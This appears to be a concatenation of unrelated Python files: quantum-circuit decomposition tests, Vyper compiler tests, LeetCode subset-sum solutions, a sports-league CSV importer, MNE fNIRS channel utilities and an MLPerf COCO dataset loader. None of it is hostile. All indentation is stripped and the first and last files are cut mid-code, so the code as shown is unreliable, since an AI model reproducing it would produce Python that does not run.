qml.Hadamard(wires=0)
return qml.expval(qml.PauliZ(0))
original_dev = qml.device("default.qubit", wires=3)
decomp_dev = qml.device("default.qubit", wires=3, custom_decomps={"Rot": custom_rot})
original_qnode = qml.QNode(circuit, original_dev, expansion_strategy="device")
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
x = qml.numpy.array([0.2, 0.3, 0.4], requires_grad=True)
original_res = original_qnode(x)
decomp_res = decomp_qnode(x)
assert np.allclose(original_res, decomp_res)
original_grad = qml.grad(original_qnode)(x)
decomp_grad = qml.grad(decomp_qnode)(x)
assert np.allclose(original_grad, decomp_grad)
expected_ops = ["Hadamard", "RZ", "PauliX", "RY", "PauliX", "RZ", "Hadamard"]
assert all(
[op.name == name for op, name in zip(decomp_qnode.qtape.operations, expected_ops)]
)
def test_nested_custom_decomp(self):
"""Test that specifying two custom decompositions that have interdependence
works as expected."""
def circuit():
qml.Hadamard(wires=0)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0))
custom_decomps = {"Hadamard": custom_hadamard, qml.CNOT: custom_cnot}
decomp_dev = qml.device("default.qubit", wires=2, custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 7
# Check the RZ gates are in the correct place
for idx in [0, 2, 5]:
assert decomp_ops[idx].name == "RZ"
assert np.isclose(decomp_ops[idx].parameters[0], np.pi)
assert decomp_ops[0].wires == Wires(0)
assert decomp_ops[2].wires == Wires(1)
assert decomp_ops[5].wires == Wires(1)
# Check RY are in the correct place
for idx in [1, 3, 6]:
assert decomp_ops[idx].name == "RY"
assert np.isclose(decomp_ops[idx].parameters[0], np.pi / 2)
assert decomp_ops[1].wires == Wires(0)
assert decomp_ops[3].wires == Wires(1)
assert decomp_ops[6].wires == Wires(1)
assert decomp_ops[4].name == "CZ"
def test_nested_custom_decomp_with_template(self):
"""Test that specifying two custom decompositions that have interdependence
works as expected even when there is a template."""
def circuit():
# -RX(0.1)-C- -> -RX(0.1)---C--- -> -RX(0.1)-----------------C----------------
# -RX(0.2)-X- -> -RX(0.2)-H-Z-H- -> -RX(0.2)-RZ(pi)-RY(pi/2)-Z-RY(pi/2)-RZ(pi)-
qml.BasicEntanglerLayers([[0.1, 0.2]], wires=[0, 1])
return qml.expval(qml.PauliZ(0))
custom_decomps = {"Hadamard": custom_hadamard, qml.CNOT: custom_cnot}
decomp_dev = qml.device("default.qubit", wires=2, custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 7
assert decomp_ops[0].name == "RX"
assert decomp_ops[0].parameters[0] == 0.1
assert decomp_ops[0].wires == Wires(0)
assert decomp_ops[1].name == "RX"
assert decomp_ops[1].parameters[0] == 0.2
assert decomp_ops[1].wires == Wires(1)
assert decomp_ops[2].name == "RZ"
assert np.isclose(decomp_ops[2].parameters[0], np.pi)
assert decomp_ops[2].wires == Wires(1)
assert decomp_ops[3].name == "RY"
assert np.isclose(decomp_ops[3].parameters[0], np.pi / 2)
assert decomp_ops[3].wires == Wires(1)
assert decomp_ops[4].name == "CZ"
assert decomp_ops[4].wires == Wires([0, 1])
assert decomp_ops[5].name == "RZ"
assert np.isclose(decomp_ops[5].parameters[0], np.pi)
assert decomp_ops[5].wires == Wires(1)
assert decomp_ops[6].name == "RY"
assert np.isclose(decomp_ops[6].parameters[0], np.pi / 2)
assert decomp_ops[6].wires == Wires(1)
def test_custom_decomp_template_to_template(self):
"""Test that decomposing a template into another template and some
gates yields the correct results."""
def circuit():
qml.BasicEntanglerLayers([[0.1, 0.2]], wires=[0, 1])
return qml.expval(qml.PauliZ(0))
# BasicEntanglerLayers custom decomposition involves AngleEmbedding
custom_decomps = {"BasicEntanglerLayers": custom_basic_entangler_layers, "RX": custom_rx}
decomp_dev = qml.device("default.qubit", wires=2, custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 5
assert decomp_ops[0].name == "RY"
assert decomp_ops[0].parameters[0] == 0.1
assert decomp_ops[0].wires == Wires(0)
assert decomp_ops[1].name == "Hadamard"
assert decomp_ops[1].wires == Wires(0)
assert decomp_ops[2].name == "RY"
assert np.isclose(decomp_ops[2].parameters[0], 0.2)
assert decomp_ops[2].wires == Wires(1)
assert decomp_ops[3].name == "Hadamard"
assert decomp_ops[3].wires == Wires(1)
assert decomp_ops[4].name == "CNOT"
assert decomp_ops[4].wires == Wires([0, 1])
def test_custom_decomp_different_depth(self):
"""Test that alternative expansion depths can be specified."""
def circuit():
qml.BasicEntanglerLayers([[0.1, 0.2]], wires=[0, 1])
return qml.expval(qml.PauliZ(0))
# BasicEntanglerLayers custom decomposition involves AngleEmbedding. If
# expansion depth is 2, the AngleEmbedding will still be decomposed into
# RX (since it's not a supported operation on the device), but the RX will
# not be further decomposed even though the custom decomposition is specified.
custom_decomps = {"BasicEntanglerLayers": custom_basic_entangler_layers, "RX": custom_rx}
decomp_dev = qml.device(
"default.qubit", wires=2, custom_decomps=custom_decomps, decomp_depth=2
)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 3
assert decomp_ops[0].name == "RX"
assert np.isclose(decomp_ops[0].parameters[0], 0.1)
assert decomp_ops[0].wires == Wires(0)
assert decomp_ops[1].name == "RX"
assert np.isclose(decomp_ops[1].parameters[0], 0.2)
assert decomp_ops[1].wires == Wires(1)
assert decomp_ops[2].name == "CNOT"
assert decomp_ops[2].wires == Wires([0, 1])
def test_custom_decomp_with_adjoint(self):
"""Test that applying an adjoint in the circuit results in the adjoint
undergoing the custom decomposition."""
def circuit():
# Adjoint is RX(-0.2), so expect RY(-0.2) H
qml.adjoint(qml.RX)(0.2, wires="a")
return qml.expval(qml.PauliZ("a"))
custom_decomps = {qml.RX: custom_rx}
decomp_dev = qml.device("default.qubit", wires="a", custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 2
assert decomp_ops[0].name == "RY"
assert decomp_ops[0].parameters[0] == -0.2
assert decomp_ops[0].wires == Wires("a")
assert decomp_ops[1].name == "Hadamard"
assert decomp_ops[1].wires == Wires("a")
def test_custom_decomp_with_control(self):
"""Test that applying a controlled version of a gate results in the
controlled version of a decomposition."""
def circuit():
qml.ctrl(qml.Hadamard, control=0)(wires=1)
return qml.expval(qml.PauliZ(0))
custom_decomps = {qml.Hadamard: custom_hadamard}
decomp_dev = qml.device("default.qubit", wires=2, custom_decomps=custom_decomps)
decomp_qnode = qml.QNode(circuit, decomp_dev, expansion_strategy="device")
_ = decomp_qnode()
decomp_ops = decomp_qnode.qtape.operations
assert len(decomp_ops) == 2
assert decomp_ops[0].name == "CRZ"
assert np.isclose(decomp_ops[0].parameters[0], np.pi)
assert decomp_ops[0].wires == Wires([0, 1])
assert decomp_ops[1].name == "CRY"
assert np.isclose(decomp_ops[1].parameters[0], np.pi / 2)
assert decomp_ops[1].wires == Wires([0, 1])
def test_custom_decomp_in_separate_context(self):
"""Test that the set_decomposition context manager works."""
dev = qml.device("default.qubit", wires=2)
@qml.qnode(dev, expansion_strategy="device")
def circuit():
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(wires=0))
# Initial test
_ = circuit()
assert len(circuit.qtape.operations) == 1
assert circuit.qtape.operations[0].name == "CNOT"
assert dev.custom_expand_fn is None
# Test within the context manager
with qml.transforms.set_decomposition({qml.CNOT: custom_cnot}, dev):
_ = circuit()
ops_in_context = circuit.qtape.operations
assert dev.custom_expand_fn is not None
assert len(ops_in_context) == 3
assert ops_in_context[0].name == "Hadamard"
assert ops_in_context[1].name == "CZ"
assert ops_in_context[2].name == "Hadamard"
# Check that afterwards, the device has gone back to normal
_ = circuit()
assert len(circuit.qtape.operations) == 1
assert circuit.qtape.operations[0].name == "CNOT"
assert dev.custom_expand_fn is None
def test_custom_decomp_used_twice(self):
"""Test that creating a custom decomposition includes overwriting the
correct method under the hood and produces expected results."""
res = []
for i in range(2):
custom_decomps = {"MultiRZ": qml.MultiRZ.compute_decomposition}
dev = qml.device("lightning.qubit", wires=2, custom_decomps=custom_decomps)
@qml.qnode(dev, diff_method="adjoint")
def cost(theta):
qml.Hadamard(wires=0)
qml.Hadamard(wires=1)
qml.MultiRZ(theta, wires=[1, 0])
return qml.expval(qml.PauliX(1))
x = np.array(0.5)
res.append(cost(x))
assert res[0] == res[1]
|
import pytest
from pytest import raises
from vyper import compiler
from vyper.exceptions import FunctionDeclarationException
fail_list = [
"""
@public
def foo() -> int128:
pass
""",
]
@pytest.mark.parametrize('bad_code', fail_list)
def test_missing_return(bad_code):
with raises(FunctionDeclarationException):
compiler.compile(bad_code)
valid_list = [
"""
@public
def foo() -> int128:
return 123
""",
"""
@public
def foo() -> int128:
if False:
return 123
""", # For the time being this is valid code, even though it should not be.
]
@pytest.mark.parametrize('good_code', valid_list)
def test_return_success(good_code):
assert compiler.compile(good_code) is not None
|
from slate import __version__
def test_version():
assert __version__ == '0.1.0'
|
"""
416. Partition Equal Subset Sum
"""
class Solution:
def canPartition(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
def dfs(beg,target):
if target == 0:
return True
for i in range(beg, len(nums)):
if target >= nums[i]:
if dfs(i+1, target - nums[i]):
return True
else: break
return False
s = sum(nums)
if s & 1:
return False
s = s >> 1
nums.sort(reverse = True)
return dfs(0,s)
class Solution:
def canPartition(self, nums):
if sum(nums) & 1 == 0:
target = sum(nums) >> 1
cur = {0}
for i in nums:
cur |= {i + x for x in cur}
if target in cur:
return True
return False
class Solution:
def canPartition(self, nums):
return (sum(nums) / 2.) in reduce(lambda cur, x: cur | {v + x for v in cur}, nums, {0})
class Solution:
def canPartition(self, nums):
total = sum(nums)
if total % 2 == 1: return False
target = total / 2 #target sum
s = set([0]) #stores the sums of the subsets
for n in nums:
sums_with_n = [] #stores the sums of the subsets that contain n
for i in s:
if i + n == target: return True
if i + n < target:
sums_with_n.append(i + n)
s.update(sums_with_n)
return False
|
#
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from cmakefile_editor import CMakeFileEditor
from code_generator import GRMTemplate
from grc_xml_generator import GRCXMLGenerator
from modtool_base import ModTool, ModToolException, get_class_dict
from modtool_add import ModToolAdd
from modtool_disable import ModToolDisable
from modtool_info import ModToolInfo
from modtool_makexml import ModToolMakeXML
from modtool_newmod import ModToolNewModule
from modtool_rm import ModToolRemove
from modtool_rename import ModToolRename
from templates import Templates
# Leave this at the end
from modtool_help import ModToolHelp
from parser_cc_block import ParserCCBlock
from util_functions import *
|
'''
@author: Dallas Fraser
@date: 2016-04-12
@organization: MLSB API
@summary: Holds a class LeagueList that helps imports a League (list of games)
'''
# imports
from sqlalchemy import func
from api.model import Sponsor, Game, League, Division
from api import DB
from api.errors import InvalidField, LeagueDoesNotExist, TeamDoesNotExist,\
DivisionDoesNotExist
import logging
import datetime
# constants
MISSING_BACKGROUND = "Missing background: {}"
LEFT_BACKGROUND_EXAMPLE = "Background example was left: {}"
INVALID_TEAM = "{} is not a team in the league"
INVALID_ROW = "Unsure what to do with the following row: {}"
INVALID_LEAGUE = "League given was not found: {}"
INVALID_DIVISION = "Division given was not found: {}"
INVALID_GAME = "The game was invalid - {} with error {}"
TEAM_NOT_FOUND = "Did not find team {} - for row {}"
BACKGROUND = {"league": "League", "division": "Division"}
HEADERS = {"home": "Home Team",
"away": "Away Team",
"date": "Date",
"time": "Time",
"field": "Field"}
class LeagueList():
def __init__(self,
lines,
year=datetime.datetime.now().year,
logger=None,
session=None):
"""A constructor
lines: a list of lines from the csv
year: the year the league was
logger: a logger
session: mock a database session
"""
self.success = False
self.errors = []
self.warnings = []
self.lines = lines
if logger is None:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(message)s')
logger = logging.getLogger(__name__)
self.logger = logger
self.year = year
self.session = session
if session is None:
self.session = DB.session
def import_league_functional(self):
""" Add a team to the database using functions instead of methods"""
# parse out the parts - background, header, players
parts = parse_parts(self.lines)
self.warnings = parts['warnings']
# extract the background such a league, sponsor and color
background = extract_background(parts['background'])
league = background["league"]
division = background["division"]
# extract the players using the header as lookup
lookup = extract_column_indices_lookup(parts['header'])
# get the team map
team_lookup = get_team_lookup(league)
# extract the games
games = extract_games(parts["games"], team_lookup, lookup)
self.warnings = self.warnings + games['warnings']
# add the players
for game_json in games['games']:
try:
game = Game(game_json["date"],
game_json["time"],
game_json["home_team_id"],
game_json["away_team_id"],
league["league_id"],
division["division_id"],
field=game_json["field"])
self.session.add(game)
except Exception as error:
game_list = [str(value) for value in game_json.values()]
game_info = "-".join(game_list)
self.warnings.append(INVALID_GAME.format(game_info,
str(error)))
self.session.commit()
def get_team_lookup(league, year=datetime.datetime.today().year):
'''
a method that sets the teams for the league
Parameters:
league: the json league object
year: the year we are importing for
Returns:
teams: a dictionary object lookup for teams
'''
teams = {}
league = League.query.get(league["league_id"])
if league is None:
raise LeagueDoesNotExist(payload={'details': league})
for team in league.teams:
if team.year == year:
teams[str(team)] = team.id
sponsor = str(Sponsor.query.get(team.sponsor_id))
teams[sponsor + " " + team.color] = team.id
return teams
def extract_column_indices_lookup(header):
""" Returns a dictionary used to lookup indices for various fields
Parameters:
header: the header array
Returns:
a dictionary {str(field): int(index)}
"""
lookup = {}
for i in range(0, len(header)):
for key, value in HEADERS.items():
if is_entry_a_header(key, value, header[i]):
lookup[key.lower()] = i
# ensure all headers were found
for key in HEADERS.keys():
if key not in lookup.keys():
error_message = "{} header missing".format(key.lower())
raise InvalidField(payload={'details': error_message})
return lookup
def is_entry_a_header(key, value, entry):
"""Returns whether the given entry in the header is a expected header."""
return (key.lower() in entry.lower() or
value.lower() in entry.lower())
def is_game_row_valid(game, lookup):
"""Returns whether all columns can be found in the game entry.
Parameters:
game: the entry for the game
lookup: a lookup for fields to indexes in columns
Returns:
true if valid row otherwise False
"""
for index in lookup.values():
if index > len(game):
return False
return True
def extract_game(game, team_lookup, lookup):
"""Returns a game json object
Parameters:
game: the entry for the game
team_lookup: a lookup for team names to player ids
lookup: a lookup for fields to indexes in columns
Returns:
a json game object, None if game data not found
"""
if not is_game_row_valid(game, lookup):
return None
away = game[lookup["away"]].strip()
home = game[lookup["home"]].strip()
time = game[lookup["time"]].strip()
field = game[lookup["field"]].strip()
date = game[lookup["date"]].strip()
# check if variables meet certain conditions
# else should be good to add game
away_team = team_lookup.get(away, None)
home_team = team_lookup.get(home, None)
if away_team is None:
error_message = INVALID_TEAM.format(away_team)
raise TeamDoesNotExist(payload={'details': error_message})
if home_team is None:
error_message = INVALID_TEAM.format(home_team)
raise TeamDoesNotExist(payload={'details': error_message})
return {"away_team_id": away_team,
"home_team_id": home_team,
"time": time,
"field": field,
"date": date}
def extract_games(games, team_lookup, lookup):
"""Returns a dictionary with list of games and warnings
Parameters:
games: the games entry rows
team_lookup: a lookup for team names to the team ids
lookup: a lookup for column indices
Returns:
a dictionary with a list of games and a list of warnings
"""
result = []
warnings = []
for game in games:
try:
game = extract_game(game, team_lookup, lookup)
if game is not None:
result.append(game)
except TeamDoesNotExist as e:
warnings.append(TEAM_NOT_FOUND.format(str(e), ",".join(game)))
return {"games": result, "warnings": warnings}
def extract_background(background):
"""Returns a dictionary of the extracted json objects from the background.
Parameters:
background: dictionary of sponsor, color, captain, league
Returns:
a dictionary of league model
"""
background_keys = [key.lower() for key in background.keys()]
for value in BACKGROUND.values():
if value.lower() not in background_keys:
errorMessage = MISSING_BACKGROUND.format(value)
raise InvalidField(payload={"details": errorMessage})
# ensure able to find the division
division_name = background['division']
if division_name.lower().startswith("ex."):
error_message = LEFT_BACKGROUND_EXAMPLE.format(division_name)
raise InvalidField(payload={"details": error_message})
division = Division.query.filter(func.lower(Division.name) ==
func.lower(division_name)).first()
# ensure able to find the league
league_name = background['league']
if league_name.lower().startswith("ex."):
error_message = LEFT_BACKGROUND_EXAMPLE.format(league_name)
raise InvalidField(payload={"details": error_message})
league = League.query.filter(func.lower(League.name) ==
func.lower(league_name)).first()
if division is None:
error_message = INVALID_DIVISION.format(division_name)
raise DivisionDoesNotExist(payload={'details': error_message})
if league is None:
error_message = INVALID_LEAGUE.format(league_name)
raise LeagueDoesNotExist(payload={'details': error_message})
return {"league": league.json(), "division": division.json()}
def clean_cell(cell):
"""Returns a clean cell"""
return cell.strip().lower().replace(":", "")
def parse_parts(lines, delimiter=","):
"""Parses the lines and returns a dictionary with the three parts
Parameters:
lines: a list of lines
delimiter: the delimiter for the lines (default = ,)
Returns:
a dictionary with background, header, games, warnings where:
background: dictionary of league
header: the header row
games: a list of games lines
warnings: a list of lines that were not recognized
"""
background = {}
header = None
games = []
warnings = []
header_keywords = ([key.lower() for key in HEADERS.keys()] +
[value.lower() for value in HEADERS.values()])
background_keywords = ([key.lower() for key in BACKGROUND.keys()] +
[value.lower() for value in BACKGROUND.values()])
for line in lines:
info = line.split(delimiter)
if clean_cell(info[0]).lower() in background_keywords:
background[clean_cell(info[0])] = info[1].strip()
elif info[0].lower().strip() in header_keywords:
header = info
elif len(info) >= len(HEADERS.keys()):
games.append(info)
else:
warnings.append(INVALID_ROW.format(line))
return {'background': background,
'header': header,
'games': games,
'warnings': warnings}
|
# Authors: Robert Luke <mail@robertluke.net>
# Eric Larson <larson.eric.d@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD-3-Clause
import re
import numpy as np
from ...io.pick import _picks_to_idx
from ...utils import fill_doc
# Standardized fNIRS channel name regexs
_S_D_F_RE = re.compile(r'S(\d+)_D(\d+) (\d+\.?\d*)')
_S_D_H_RE = re.compile(r'S(\d+)_D(\d+) (\w+)')
@fill_doc
def source_detector_distances(info, picks=None):
r"""Determine the distance between NIRS source and detectors.
Parameters
----------
%(info_not_none)s
%(picks_all)s
Returns
-------
dists : array of float
Array containing distances in meters.
Of shape equal to number of channels, or shape of picks if supplied.
"""
dist = [np.linalg.norm(ch['loc'][3:6] - ch['loc'][6:9])
for ch in info['chs']]
picks = _picks_to_idx(info, picks, exclude=[])
return np.array(dist, float)[picks]
@fill_doc
def short_channels(info, threshold=0.01):
r"""Determine which NIRS channels are short.
Channels with a source to detector distance of less than
``threshold`` are reported as short. The default threshold is 0.01 m.
Parameters
----------
%(info_not_none)s
threshold : float
The threshold distance for what is considered short in meters.
Returns
-------
short : array of bool
Array indicating which channels are short.
Of shape equal to number of channels.
"""
return source_detector_distances(info) < threshold
def _channel_frequencies(info, nominal=False):
"""Return the light frequency for each channel."""
# Only valid for fNIRS data before conversion to haemoglobin
picks = _picks_to_idx(info, ['fnirs_cw_amplitude', 'fnirs_od'],
exclude=[], allow_empty=True)
freqs = np.empty(picks.size, int)
for ii in picks:
if nominal:
freq = float(_S_D_F_RE.match(info['ch_names'][ii]).groups()[2])
else:
freq = info['chs'][ii]['loc'][9]
freqs[ii] = freq
return freqs
def _channel_chromophore(info):
"""Return the chromophore of each channel."""
# Only valid for fNIRS data after conversion to haemoglobin
picks = _picks_to_idx(info, ['hbo', 'hbr'], exclude=[], allow_empty=True)
chroma = []
for ii in picks:
chroma.append(info['ch_names'][ii].split(" ")[1])
return chroma
def _check_channels_ordered(info, pair_vals):
"""Check channels follow expected fNIRS format."""
# Every second channel should be same SD pair
# and have the specified light frequencies.
# All wavelength based fNIRS data.
picks_wave = _picks_to_idx(info, ['fnirs_cw_amplitude', 'fnirs_od'],
exclude=[], allow_empty=True)
# All chromophore fNIRS data
picks_chroma = _picks_to_idx(info, ['hbo', 'hbr'],
exclude=[], allow_empty=True)
# All continuous wave fNIRS data
picks_cw = np.hstack([picks_chroma, picks_wave])
if (len(picks_wave) > 0) & (len(picks_chroma) > 0):
raise ValueError(
'MNE does not support a combination of amplitude, optical '
'density, and haemoglobin data in the same raw structure.')
if len(picks_cw) % 2 != 0:
raise ValueError(
'NIRS channels not ordered correctly. An even number of NIRS '
f'channels is required. {len(info.ch_names)} channels were'
f'provided: {info.ch_names}')
# Ensure wavelength info exists for waveform data
all_freqs = [info["chs"][ii]["loc"][9] for ii in picks_wave]
if np.any(np.isnan(all_freqs)):
raise ValueError(
'NIRS channels is missing wavelength information in the'
f'info["chs"] structure. The encoded wavelengths are {all_freqs}.')
for ii in picks_cw[::2]:
ch1_name_info = _S_D_F_RE.match(info['chs'][ii]['ch_name'])
ch2_name_info = _S_D_F_RE.match(info['chs'][ii + 1]['ch_name'])
if bool(ch2_name_info) & bool(ch1_name_info):
first_value = float(ch1_name_info.groups()[2])
second_value = float(ch2_name_info.groups()[2])
error_word = "frequencies"
else:
ch1_name_info = _S_D_H_RE.match(info['chs'][ii]['ch_name'])
ch2_name_info = _S_D_H_RE.match(info['chs'][ii + 1]['ch_name'])
if bool(ch2_name_info) & bool(ch1_name_info):
first_value = ch1_name_info.groups()[2]
second_value = ch2_name_info.groups()[2]
error_word = "chromophore"
if (first_value not in ["hbo", "hbr"] or
second_value not in ["hbo", "hbr"]):
raise ValueError(
"NIRS channels have specified naming conventions."
"Chromophore data must be labeled either hbo or hbr."
"Failing channels are "
f"{info['chs'][ii]['ch_name']}, "
f"{info['chs'][ii + 1]['ch_name']}")
else:
raise ValueError(
'NIRS channels have specified naming conventions.'
'The provided channel names can not be parsed.'
f'Channels are {info.ch_names}')
if (ch1_name_info.groups()[0] != ch2_name_info.groups()[0]) or \
(ch1_name_info.groups()[1] != ch2_name_info.groups()[1]) or \
(first_value != pair_vals[0]) or \
(second_value != pair_vals[1]):
raise ValueError(
'NIRS channels not ordered correctly. Channels must be ordered'
' as source detector pairs with alternating'
f' {error_word}: {pair_vals[0]} & {pair_vals[1]}')
_fnirs_check_bads(info)
return picks_cw
def _validate_nirs_info(info):
"""Apply all checks to fNIRS info. Works on all continuous wave types."""
freqs = np.unique(_channel_frequencies(info, nominal=True))
if freqs.size > 0:
picks = _check_channels_ordered(info, freqs)
else:
picks = _check_channels_ordered(info,
np.unique(_channel_chromophore(info)))
return picks
def _fnirs_check_bads(info):
"""Check consistent labeling of bads across fnirs optodes."""
# For an optode pair, if one component (light frequency or chroma) is
# marked as bad then they all should be. This function checks that all
# optodes are marked bad consistently.
picks = _picks_to_idx(info, 'fnirs', exclude=[], allow_empty=True)
for ii in picks[::2]:
want = info.ch_names[ii:ii + 2]
got = list(set(info['bads']).intersection(want))
if len(got) == 1:
raise RuntimeError(
f'NIRS bad labelling is not consistent, found {got} but '
f'needed {want}')
def _fnirs_spread_bads(info):
"""Spread bad labeling across fnirs channels."""
# For an optode pair if any component (light frequency or chroma) is marked
# as bad, then they all should be. This function will find any pairs marked
# as bad and spread the bad marking to all components of the optode pair.
picks = _picks_to_idx(info, 'fnirs', exclude=[], allow_empty=True)
new_bads = list()
for ii in picks[::2]:
bad_opto = set(info['bads']).intersection(info.ch_names[ii:ii + 2])
if len(bad_opto) > 0:
new_bads.extend(info.ch_names[ii:ii + 2])
info['bads'] = new_bads
return info
|
# Copyright (c) 2019 Putt Sakdhnagool <putt.sakdhnagool@nectec.or.th>,
#
from __future__ import print_function
import re
first_cap_re = re.compile('(.)([A-Z][a-z]+)')
all_cap_re = re.compile('([a-z0-9])([A-Z])')
def to_snake_case(val):
s1 = first_cap_re.sub(r'\1_\2', val)
return all_cap_re.sub(r'\1_\2', s1).lower()
|
"""
implementation of imagenet dataset
"""
# pylint: disable=unused-argument,missing-docstring
import json
import logging
import os
import time
import cv2
import numpy as np
from pycocotools.cocoeval import COCOeval
import pycoco
import dataset
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("coco")
class Coco(dataset.Dataset):
def __init__(self, data_path, image_list, name, use_cache=0, image_size=None,
image_format="NHWC", pre_process=None, count=None, cache_dir=None,use_label_map=False):
super().__init__()
self.image_size = image_size
self.image_list = []
self.label_list = []
self.image_ids = []
self.image_sizes = []
self.count = count
self.use_cache = use_cache
self.data_path = data_path
self.pre_process = pre_process
self.use_label_map=use_label_map
if not cache_dir:
cache_dir = os.getcwd()
self.cache_dir = os.path.join(cache_dir, "preprocessed", name, image_format)
# input images are in HWC
self.need_transpose = True if image_format == "NCHW" else False
not_found = 0
empty_80catageories = 0
if image_list is None:
# by default look for val_map.txt
image_list = os.path.join(data_path, "annotations/instances_val2017.json")
self.annotation_file = image_list
if self.use_label_map:
# for pytorch
label_map = {}
with open(self.annotation_file) as fin:
annotations = json.load(fin)
for cnt, cat in enumerate(annotations["categories"]):
label_map[cat["id"]] = cnt + 1
os.makedirs(self.cache_dir, exist_ok=True)
start = time.time()
images = {}
with open(image_list, "r") as f:
coco = json.load(f)
for i in coco["images"]:
images[i["id"]] = {"file_name": i["file_name"],
"height": i["height"],
"width": i["width"],
"bbox": [],
"category": []}
for a in coco["annotations"]:
i = images.get(a["image_id"])
if i is None:
continue
catagory_ids = label_map[a.get("category_id")] if self.use_label_map else a.get("category_id")
i["category"].append(catagory_ids)
i["bbox"].append(a.get("bbox"))
for image_id, img in images.items():
image_name = os.path.join("val2017", img["file_name"])
src = os.path.join(data_path, image_name)
if not os.path.exists(src):
# if the image does not exists ignore it
not_found += 1
continue
if len(img["category"])==0 and self.use_label_map:
#if an image doesn't have any of the 81 categories in it
empty_80catageories += 1 #should be 48 images - thus the validation sert has 4952 images
continue
os.makedirs(os.path.dirname(os.path.join(self.cache_dir, image_name)), exist_ok=True)
dst = os.path.join(self.cache_dir, image_name)
if not os.path.exists(dst + ".npy"):
# cache a preprocessed version of the image
img_org = cv2.imread(src)
processed = self.pre_process(img_org, need_transpose=self.need_transpose, dims=self.image_size)
np.save(dst, processed)
self.image_ids.append(image_id)
self.image_list.append(image_name)
self.image_sizes.append((img["height"], img["width"]))
self.label_list.append((img["category"], img["bbox"]))
# limit the dataset if requested
if self.count and len(self.image_list) >= self.count:
break
time_taken = time.time() - start
if not self.image_list:
log.error("no images in image list found")
raise ValueError("no images in image list found")
if not_found > 0:
log.info("reduced image list, %d images not found", not_found)
if empty_80catageories > 0:
log.info("reduced image list, %d images without any of the 80 categories", empty_80catageories)
log.info("loaded {} images, cache={}, took={:.1f}sec".format(
len(self.image_list), use_cache, time_taken))
self.label_list = np.array(self.label_list)
def get_item(self, nr):
"""Get image by number in the list."""
dst = os.path.join(self.cache_dir, self.image_list[nr])
img = np.load(dst + ".npy")
return img, self.label_list[nr]
def get_item_loc(self, nr):
src = os.path.join(self.data_path, self.image_list[nr])
return src
class PostProcessCoco:
"""
Post processing for tensorflow ssd-mobilenet style models
"""
def __init__(self):
self.results = []
self.good = 0
self.total = 0
self.content_ids = []
self.use_inv_map = False
def add_results(self, results):
self.results.extend(results)
def __call__(self, results, ids, expected=None, result_dict=None, ):
# results come as:
# tensorflow, ssd-mobilenet: num_detections,detection_boxes,detection_scores,detection_classes
processed_results = []
# batch size
bs = len(results[0])
for idx in range(0, bs):
# keep the content_id from loadgen to handle content_id's without results
self.content_ids.append(ids[idx])
processed_results.append([])
detection_num = int(results[0][idx])
detection_boxes = results[1][idx]
detection_classes = results[3][idx]
expected_classes = expected[idx][0]
for detection in range(0, detection_num):
detection_class = int(detection_classes[detection])
if detection_class in expected_classes:
self.good += 1
box = detection_boxes[detection]
processed_results[idx].append([float(ids[idx]),
box[0], box[1], box[2], box[3],
results[2][idx][detection],
float(detection_class)])
self.total += 1
return processed_results
def start(self):
self.results = []
self.good = 0
self.total = 0
def finalize(self, result_dict, ds=None, output_dir=None):
result_dict["good"] += self.good
result_dict["total"] += self.total
if self.use_inv_map:
# for pytorch
label_map = {}
with open(ds.annotation_file) as fin:
annotations = json.load(fin)
for cnt, cat in enumerate(annotations["categories"]):
label_map[cat["id"]] = cnt + 1
inv_map = {v:k for k,v in label_map.items()}
detections = []
image_indices = []
for batch in range(0, len(self.results)):
image_indices.append(self.content_ids[batch])
for idx in range(0, len(self.results[batch])):
detection = self.results[batch][idx]
# this is the index of the coco image
image_idx = int(detection[0])
if image_idx != self.content_ids[batch]:
# working with the coco index/id is error prone - extra check to make sure it is consistent
log.error("image_idx missmatch, lg={} / result={}".format(image_idx, self.content_ids[batch]))
# map the index to the coco image id
detection[0] = ds.image_ids[image_idx]
height, width = ds.image_sizes[image_idx]
# box comes from model as: ymin, xmin, ymax, xmax
ymin = detection[1] * height
xmin = detection[2] * width
ymax = detection[3] * height
xmax = detection[4] * width
# pycoco wants {imageID,x1,y1,w,h,score,class}
detection[1] = xmin
detection[2] = ymin
detection[3] = xmax - xmin
detection[4] = ymax - ymin
if self.use_inv_map:
cat_id = inv_map.get(int(detection[6]), -1)
if cat_id == -1:
# FIXME:
log.info("finalize can't map category {}".format(int(detection[6])))
detection[6] = cat_id
detections.append(np.array(detection))
# map indices to coco image id's
image_ids = [ds.image_ids[i] for i in image_indices]
self.results = []
cocoGt = pycoco.COCO(ds.annotation_file)
